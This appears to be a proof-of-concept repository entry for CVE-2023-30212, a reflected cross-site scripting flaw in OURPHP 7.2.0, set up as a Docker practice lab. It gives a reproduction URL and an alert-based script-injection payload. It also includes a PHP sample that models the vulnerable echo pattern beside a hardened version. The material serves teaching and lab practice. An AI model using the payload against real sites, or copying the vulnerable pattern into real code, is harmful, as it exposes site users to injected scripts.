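POC details: 0ebc3c10f0956d34945f57f6ddc9584860c4e69c

Source
Related vulnerability
Title: OURPHP cross-site scripting vulnerability (CVE-2023-30212)
Description: OURPHP is an open-source, cross-platform CMS site-building system from OURPHP that keeps enterprise, e-commerce, mini-program and app front ends in sync. OURPHP 7.2.0 and earlier contain a security vulnerability: a cross-site scripting (XSS) vulnerability was found in the file ourphp_out.php.
Description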
This repository provides a Docker container for simulating the CVE-2023-30212 vulnerability, allowing you to practice and understand its impact. It includes a comprehensive guide to help you set up the container on your own computer. The documentation for the Docker creation process is also included.
Introduction
# CVE-2023-30212 POC : Cross-Site Scripting
#### via /client/manage/ourphp_out.php

## Products Affected By CVE-2023-30212 :

| Vendor          | Product         | Version |
|:--------:       |:--------:       |:--------:|
| ourphp          | ourphp          |  7.2.0   |

## Docker Installation Guide :

To install OURPHP <= 7.2.0 in Docker for practice purposes, follow the [guide](https://github.com/Rishipatidar/CVE-2023-30212-POC-DOCKER-FILE/blob/main/Docker%20Setup%20for%20vulnerability%20CVE-2023-30212%20.pdf).


## Explanation of Vulnerability:

OURPHP version 7.2.0 is vulnerable to XSS (Cross-Site Scripting).

The file `/client/manage/ourphp_out.php` echoes a controllable variable directly into the response, which lets an attacker execute XSS code. When the `ourphp_admin` parameter is set to `logout`, the page echoes the controllable variable `out`.

The payload starts by closing the surrounding script tag and then supplies a script element of its own. The vulnerability can be exploited through the `out` parameter by injecting the following script: ``</script><script>alert(`xss`)</script>``
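The echo-into-script pattern described above, modeled next to a hardened form. This is an added PHP example, not code from OURPHP or from this repository; the function names, the surrounding markup and the assumption that `out` feeds a redirect are hypothetical.

```php
<?php
// Added example: hypothetical model of the pattern, NOT the source of
// ourphp_out.php. Function names, markup and the redirect sink are assumed.

// Vulnerable: the parameter is echoed verbatim inside a <script> block, so a
// value containing "</script>" ends the block and starts attacker markup.
function render_logout_vulnerable(array $query): string
{
    if (($query['ourphp_admin'] ?? '') !== 'logout') {
        return '';
    }
    return "<script>location.href='" . ($query['out'] ?? '') . "';</script>";
}

// Layer 1: emit the value as a JavaScript string literal. JSON_HEX_TAG turns
// < and > into \u003C / \u003E, so no closing </script> reaches the parser.
function js_string(string $value): string
{
    return json_encode($value, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS
        | JSON_HEX_QUOT | JSON_INVALID_UTF8_SUBSTITUTE);
}

// Layer 2: the assumed sink is a redirect, so accept only same-site paths
// ("/x", never "//host", "/\host" or "javascript:") and fall back to "/".
function safe_redirect_target($out): string
{
    $ok = is_string($out) && preg_match('#^/(?!/)[\w\-./?=&%]*\z#', $out) === 1;
    return $ok ? $out : '/';
}

function render_logout_hardened(array $query): string
{
    if (($query['ourphp_admin'] ?? '') !== 'logout') {
        return '';
    }
    $target = safe_redirect_target($query['out'] ?? '');
    return '<script>location.href=' . js_string($target) . ';</script>';
}

// Constructed sample request carrying the payload quoted on this page.
$query = ['ourphp_admin' => 'logout', 'out' => '</script><script>alert(`xss`)</script>'];

echo "vulnerable: ", render_logout_vulnerable($query), PHP_EOL;
echo "hardened:   ", render_logout_hardened($query), PHP_EOL;
echo "encoded:    ", js_string($query['out']), PHP_EOL;
```

The third line of output shows the encoding layer on its own: the angle brackets arrive as `\u003C` and `\u003E`, so the browser's HTML parser never sees a closing script tag inside the string.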
## Steps to Reproduce the issue:

After completing the Docker setup, access the following path:

```text
http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert(`xss`)</script>
```
## Payload for the Vulnerability:

```text
</script><script>alert(`xss`)</script>
```
## Video
[![CVE-2023-30212](https://i.postimg.cc/sX95Ghkw/Screenshot-2023-05-25-231747.png)](https://vimeo.com/830293942?share=copy)


## References

1. [NIST](https://nvd.nist.gov/vuln/detail/CVE-2023-30212)
2. [cve.mitre.org](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-30212)
3. [OURPHP <= 7.2.0: code for reference](https://wanheiqiyihu.top/2023/03/27/OURPHP-v7-2-0-ourphp-out-php-Reflection-xss/)

File snapshot

```text
[4.0K] /data/pocs/0ebc3c10f0956d34945f57f6ddc9584860c4e69c
├── [ 83K] Docker Setup for vulnerability CVE-2023-30212 .pdf
└── [1.8K] README.md

0 directories, 2 files
```